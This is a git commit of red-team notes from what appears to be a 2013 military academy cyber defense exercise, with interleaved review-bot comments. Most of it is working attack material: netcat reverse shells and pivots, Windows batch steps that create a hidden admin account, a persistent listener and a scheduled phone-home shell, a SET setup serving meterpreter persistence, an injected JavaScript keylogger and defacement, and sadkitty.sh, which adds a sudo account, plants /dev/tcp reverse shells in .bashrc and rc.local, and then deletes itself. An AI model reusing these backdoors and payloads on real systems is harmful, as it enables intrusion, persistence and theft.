Commit 0e3d04e
2013-05-28 10:10:24
Changed files (3)
CDX-RC-2012
sadkitty
CDX-RC-2012/README.md
@@ -0,0 +1,326 @@
+CDX-RC-Docs
+===========
+Feel free to pull this doc to add, update, correct it
+
+
+s#!thackersay
+--------------
+
+1. whack back doublebackwhack - n00bfac3
+2. I'm touching it the wrong way - moose
+3. every cloud has a cyber lining - bryfry
+4. I'm taking an fgdump all over this - dub
+5. It's Mudge's little thing keeping us in there! - dub
+6. I cannot have enough shells right now, it's ridiculous! Shells on shells on shells! Shells gone wild! - moose
+7. I cacl'd it up in there! - n00bfac3
+8. dub: The G-Spot is going to be beaconing
+
+ bryfry: You should come up with another word for beaconing.
+
+9. You just dumped your own hashes - d1
+10. It's very very hung - dub
+11. ```21:45:45 <Mr.T> I tty the foo```
+12. Yeah, you can't control-C... - moose
+13. It wasn't a stupid question–it's the middle of the night…literally! - n00bfac3
+14. The question is NO - moose
+15. hash-bang explana-brag! - bryfry
+16. I'm going to insert the trojan in the box, drop my payload, and spawn so many child processes - mstaint
+
+Bad Red Cell Hat Log
+--------------------
+1. Rookie4U scanned from armitage server.
+2. Rookie4U scanned from armitage server again.
+3. and again.
+4. Mudge egressed on 21
+5. p0nyExpr3ss exploited from armitage server
+6. bryfry posted red team SSH keys to public drop box
+7. (honorary) Cmdr Odom grabbed passwd/shadow ... of local machine (GET FTW)
+
+Media
+-----
+
+Screenshots & Photos: http://goo.gl/MVeB3
+
+Armitage
+--------
+
+#### Client Setup
+
+ * Host: ```<armitage server ip>```
+ * Port: ```55553```
+ * User: ```msf```
+ * Pass: ```<password>```
+
+#### Server Setup
+
+``` bash
+# get the teamserver startup script that doesnt come on bt5 rc2
+cd /opt/metasploit/msf3/data/armitage
+wget http://armitage.googlecode.com/svn-history/r737/trunk/release/armitage-unix/teamserver
+chmod a+x teamserver
+# start the server
+./teamserver <external ip> <password>
+```
+
+NetCat
+------
+
+Server (listener):
+``` bash
+ncat <ip> <port> -klvm 1
+```
+
+Client:
+``` bash
+nc <server ip> <port> -e /bin/bash 1>/dev/null 2>/dev/null &
+```
+
+Upgrade from nc shell to terminal-ish:
+``` bash
+python -c 'import pty; pty.spawn("/bin/sh")
+```
+
+#### nc Pivoting with Named Pipes
+
+
+```
+
+### Setup ###
+
++-----------------+ +----------------+ +----------------+
+| attacker | | nc pivot | | target |
+|-----------------| |----------------| |----------------|
+| | | | | |
+| attacker net |<-------| target net | | target net |
+| | nc | | | |
++-----------------+ +----------------+ +----------------+
+
+### Execute ###
+ nc pivot $ mknod x p
++-----+ $ nc <attacker ip> 443 < x | nc <target ip> 445 > x
+| msf |
++-----+ attacker $ mknod y p
+ | $ nc -klp 443 < y | nc -klp 1234 > y
+ v
++-----------------+ +----------------+ +----------------+
+| | attacker | | nc pivot | | target |
+|-----------------| |----------------| |----------------|
+| | | | | | |
+| | +->|<------>|-----> x ------>|-------->| :( |
+| v | | | | | |
++--------------+--+ +----------------+ +----------------+
+ 1234 443
+ ^ ^
+ | localhost |
+ +--> y <--+
+```
+
+#### Port Knocking to initiate nc with iptables
+
+iptables: watch for tcp connection on ```<port>```
+
+```
+sudo iptables -A INPUT -p tcp --dport <port> -j LOG --log-prefix="token <port>"
+```
+
+Watch log for token
+
+```
+tail -f /var/log/messages | awk '/token <port>/ {system("/sbin/netplugd-ng <port>")}' &
+```
+
+
+
+
+Windows
+-------
+
+#### Change user desktop
+
+``` cmd
+reg add "hkcu\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
+reg add "hkcu\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\[LOCATION OF WALLPAPER]" /f
+reg delete "hkcu\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
+reg add "hkcu\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
+RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
+```
+
+#### Windows .bat runs token_util.exe
+
+save following code into younameit.bat
+
+``` bash
+@echo off
+start "" "C:\TOKEN_AGENT\token_agent_cxfreeze\token_util.exe"
+```
+
+#### Add new user
+
+``` cmd
+@echo Adding new user...
+net user WindowsAssistance P@ssw0rd /add
+@echo Adding new user to Admin and Remote access groups...
+net localgroup Administrators WindowsAssistance /add
+net localgroup "Remote Desktop Users" WindowsAssistance /add
+```
+
+#### Hide user from Welcome screen
+
+``` cmd
+@echo Hiding new user from welcome screen...
+reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v WindowsAssistance /t REG_DWORD /d 0 /f
+```
+
+#### Enable RDP
+
+``` cmd
+@echo Enabling Remote Desktop Service and opening firewall port...
+netsh firewall set service remoteadmin enable
+netsh firewall set service remotedesktop enable
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
+```
+
+#### Enable Telnet
+
+``` cmd
+@echo Enabling telnet and opening port...
+sc config tlntsvr start= auto
+net start telnet
+netsh firewall add portopening TCP 23 Telnet
+```
+
+#### Install Persistent NetCat Listener
+
+``` cmd
+@echo Installing persistent netcat listener...
+copy znc.exe %SYSTEMROOT%
+echo znc.exe -L -p %BACKDOOR_PORT% -d -e cmd.exe > Windows-Backup.bat
+copy Windows-Backup.bat "%USERPROFILE%\Start Menu\Programs\Startup"
+attrib +R +H "%USERPROFILE%\Start Menu\Programs\Startup\Windows-Backup.bat"
+attrib +R +H Windows-Backup.bat
+netsh firewall add portopening TCP %BACKDOOR_PORT% Windows-Backup
+```
+
+#### NetCat Caller
+
+``` cmd
+@echo Creating phone-home task...
+echo ECHO OFF > %SYSTEMROOT%\service.bat
+echo znc.exe %NCL% 8080 -d -e cmd.exe >> %SYSTEMROOT%\service.bat
+attrib +R +H %SYSTEMROOT%\service.bat
+schtasks /create /RU RemoteAssistance /RP P@ssw0rd /SC MINUTE /MO 5 /TN Backup /TR "service.bat"
+schtasks /change /tn Backup /ru ""
+```
+
+#### See Windows sessions and kill one
+
+``` cmd
+C:\windows\system32\dllcache\quser.exe
+logoff <sessionid>
+```
+
+#### Wiggle da mouse! (kill the screensaver)
+
+```taskkill /f /im logon.scr```
+
+#### NET USER using IPv6
+
+```net use X: \\2001-dbb-c18-555-f8d9-a1ea-b86e-10ad.ipv6-literal.net\SYSVOL /user:scorebot Dinosaur2```
+
+Misc. Tools / Tricks
+--------------------
+
+#### DNS Zone Transfers
+
+dnstz.rb
+
+``` ruby
+#!/usr/bin/env ruby
+
+teams = [
+['10.1.20.5','usafa.bluenet'],
+['10.1.30.5','afit1.bluenet'],
+['10.1.40.5','uscga.bluenet'],
+['10.1.50.5','usmma.bluenet'],
+['10.1.60.5','usma.bluenet'],
+['10.1.70.5','usna.bluenet'],
+['10.1.80.5','afit2.bluenet'],
+['10.1.90.5','nps.bluenet'],
+['10.1.100.5','rmc.bluenet']
+]
+
+teams.each do |team|
+
+dump = %x[dig -t AXFR #{team[1]} @#{team[0]} +time=1]
+
+puts dump
+end
+```
+
+#### Wireshark of Remote Host
+
+This will run a tcpdump on a remote host and pipe the results through ssh back to your local host and show it in wireshark.
+
+```
+ssh <user>@<remote ip> tcpdump -U -s0 -w - 'not port 22' | wireshark -k -i -
+```
+
+#### Create a malware serving website with SET
+
+```cd /pentest/exploit/set```
+
+edit /pentest/exploit/set/config/set_config
+
+```
+METERPRETER_MULTI_SCRIPT=ON
+METERPRETER_MULTI_COMMANDS= run persistence -r 10.2.222.222 -p 443 -P windows/meterpreter/reverse_https -i 5 -X -A -U
+AUTO_DETECT=ON
+APACHE_SERVER=ON
+APACHE_DIRECTORY=/var/www
+SELF_SIGNED_APPLET=ON
+JAVA_ID_PARAM=Secure CDX Java App #or whatever you want
+AUTOMATIC_LISTENER=ON
+```
+
+Start set: ```./set```
+
+```
+1) Social-Engineering Attacks
+2) Website Attack Vectors
+1) Java Applet Attack Method
+Clone or Template
+Input your web server external IP
+9) Windows Meterpreter Reverse HTTPS
+16) Backdoored Executable
+Default listener port [443]
+```
+
+Get a dns entry created for your website
+
+Sit back and wait patiently
+
+USAFA Website Defacement / Keylogger
+------------------------------------
+
+#### The open door
+``` html
+<script type="text/javascript" src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
+```
+
+#### The site defacement
+``` javascript
+define=="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return f})})(window);
+jQuery(document).ready(function() { jQuery("td a img").first().attr("src", "http://www.whitehouse.com/jb7.jpg").attr("width", 128).attr("height", 200).attr("alt", "boys, this is what you're fighting for");
+jQuery(".boardtitle").text("Boys, this is what you're fighting for");
+```
+
+#### The Keylogger
+
+``` javascript
+jQuery("body").append("<script SRC=\"http://10.2.36.5:443/analytics/test.js\"></script>"); });
+```
+
+js created with: ```msf> use auxiliary/server/capture/http_javascript_keylogger```a
+
+
+
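Review bot: the account names in the Windows section do not match: `net user WindowsAssistance P@ssw0rd /add` (Add new user) and the Welcome-screen `UserList` entry create and hide `WindowsAssistance`, but the NetCat Caller task is created with `/RU RemoteAssistance /RP P@ssw0rd`, so the `schtasks /create` line refers to an account none of these steps creates; settle on one name. The same snippets commit cleartext credentials to the repository (`P@ssw0rd` twice, and `scorebot Dinosaur2` in the IPv6 `net use` line), which should not sit in a README even for an exercise. `%BACKDOOR_PORT%` and `%NCL%` are used but never defined or explained; say where they are set. Smaller points: the `python -c 'import pty; pty.spawn("/bin/sh")` line is missing its closing single quote; the block under "Windows .bat runs token_util.exe" is fenced as `bash` while every other batch snippet uses `cmd`; item 8 of the quotes list breaks the numbering with its two unnumbered continuation lines; and there is a stray `a` after the closing backticks on the `http_javascript_keylogger` line.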
sadkitty/README.md
@@ -0,0 +1,11 @@
+sadkitty
+========
+
+Welcome to the l1tt3r b0x
+```
+ \ /\\
+ ) ( ')
+ ( / )
+ \(__)| meow, sup bitches?
+```
+
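Review bot: this README says nothing about what `sadkitty.sh` in the same directory does or where it is meant to be run; a sentence stating its effect on a host (it adds accounts, replaces the iptables input policy, rewrites `/etc/rc.local`, appends to `/etc/sudoers` and `~/.bashrc`, changes the SSH banner and then deletes itself) would keep someone from running it by accident outside the exercise network.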
sadkitty/sadkitty.sh
@@ -0,0 +1,28 @@
+#!/bin/sh
+adduser nntp --system --shell /bin/sh --home /var/spool/news --uid 50
+echo "nntp|badpassw0rd!!!" | chpasswd
+echo "nntp ALL=(ALL) ALL" >> /etc/sudoers
+useradd -g nntp admin
+iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
+iptables -A INPUT -i lo -j ACCEPT
+iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 22 -j ACCEPT
+iptables -A INPUT -s 192.168.12.152/255.255.255.255 -j ACCEPT
+iptables -A INPUT -j REJECT --reject-with icmp-host-prohibited
+/etc/init.d/samba restart
+echo "/bin/bash -i > /dev/tcp/192.168.12.152/6666 0>&1 &" >> ~/.bashrc
+echo "#!/bin/bash
+/bin/bash -i > /dev/tcp/192.168.12.152/6667 0>&1 &
+exit 0" > /etc/rc.local
+echo "
+Welcome to the l1tt3r b0x
+
+ \ /\\
+ ) ( ')
+ ( / )
+ \(__)| meow, sup bitches?
+
+" > /etc/issue.net
+echo "Banner /etc/issue.net" >> /etc/ssh/sshd_config
+/etc/init.d/ssh restart
+rm `pwd`/sadkitty.sh
+
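Review bot: the script makes irreversible changes with no header comment describing its intended environment: it overwrites `/etc/rc.local` wholesale with the three-line `echo ... > /etc/rc.local`, appends to `/etc/sudoers` with a plain `>>` instead of going through `visudo`'s syntax check (a malformed sudoers file locks everyone out of sudo), appends to the invoking user's `~/.bashrc`, and removes itself with `rm \`pwd\`/sadkitty.sh`, leaving no record of what was changed. The callback address `192.168.12.152` and the cleartext password on the `chpasswd` line are committed to the repository, and `useradd -g nntp admin` creates a second account (`admin`) that nothing on the page mentions; at minimum document every account and file the script touches so a blue team or the next operator can undo it.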